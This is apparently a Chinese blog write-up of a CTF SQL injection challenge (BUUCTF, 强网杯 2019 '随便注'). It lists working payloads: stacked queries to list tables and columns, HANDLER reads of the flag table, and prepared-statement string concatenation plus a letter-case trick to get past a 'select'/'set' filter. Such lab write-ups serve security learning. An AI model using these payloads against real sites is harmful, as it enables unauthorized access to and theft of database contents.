zoukankan      html  css  js  c++  java
  • BUUCTF-[强网杯 2019]随便注-wp

    一进去 

     1‘ 提交 判断 是否报错

     很明显存在注入点 

    MariaDB就是mysql的数据库好像

    虽然没必要用Python  但是为了练练Python 

    整个过程走完还是有必要 用Python 再来一遍 

    payload1: 判断列数 1' order by 2 #

    得出2列

    使用 union select 

     用正则强行过滤 就别考虑 编码 双写什么的了  浪费时间

    而且这题已经给出了提示 说明存在源码的可能性很小

    构造报错注入 1' and (extractvalue(1,concat(0x7e,database(),0x7e)));#  

     其实也就那样了还是要用到select   用handler 首先也要知道 表名是啥

    盲注试过了 没用 

    各个注入测测 最后只有堆叠 好用

    payload:  1';show tables#

     直接把输入框当数据库玩

    这里看到一串数字 猜测 flag在这个表里 

    然后看字段payload :      -1'; show columns from `表名`#   

    看到flag 

     但是 要继续找 还是要用到select  这里用handler 好像也行 就是比较少见 但是非常方便 

    比如 payload: -1';handler `1919810931114514` open;handler `1919810931114514` read first;#                  handler主要是用来查表中数据  它甚至可以不用知道字段值   read first 读取表中数据第一行  结果:

     另一种 是通过预编译 进行绕过 select

    payload: -1';set @sql=('se','lect * from `1919810931114514`;'); prepare x from @sql;EXECUTE x;#         //预编译语句 先将拼接的搜索语句传给 @sql 再为它取个别名 用EXECUTE 刷新声明执行 搜索语句 

     这才是出题者的套路  不知道 它有想过 有大佬 能想到 handler 嘛?

    strstr函数存在的小漏洞是 简单匹配set  但是不会匹配到Set 而 我们输入 Set 不影响我们预编译代码执行   因为对面是windows系统  不区分大小写
    payload : -1';Set @sql=concat('se','lect * from `1919810931114514`;');Prepare x from @sql;EXECUTE x;#

    出来!

    然后我再用Python 编个poc 简单找flag 把语句放进去就行了 主要是 嗯 专业 !

     

  • 相关阅读:
    Indy的TCPServer到底能支持多少个连接
    Delphi TStream 详细介绍
    WebAPI下的如何实现参数绑定
    使用 Weinre 调试移动网站及 PhoneGap 应用
    面向对象的三大特征:封装、继承、多态
    轻量级前端MVVM框架avalon
    三种工厂模式的分析以及C++实现
    简单实现TCP下的大文件高效传输
    Nunit NMock Ncover单元测试
    算法实践——数独的基本解法
  • 原文地址:https://www.cnblogs.com/Sabia/p/14056661.html
Copyright © 2011-2022 走看看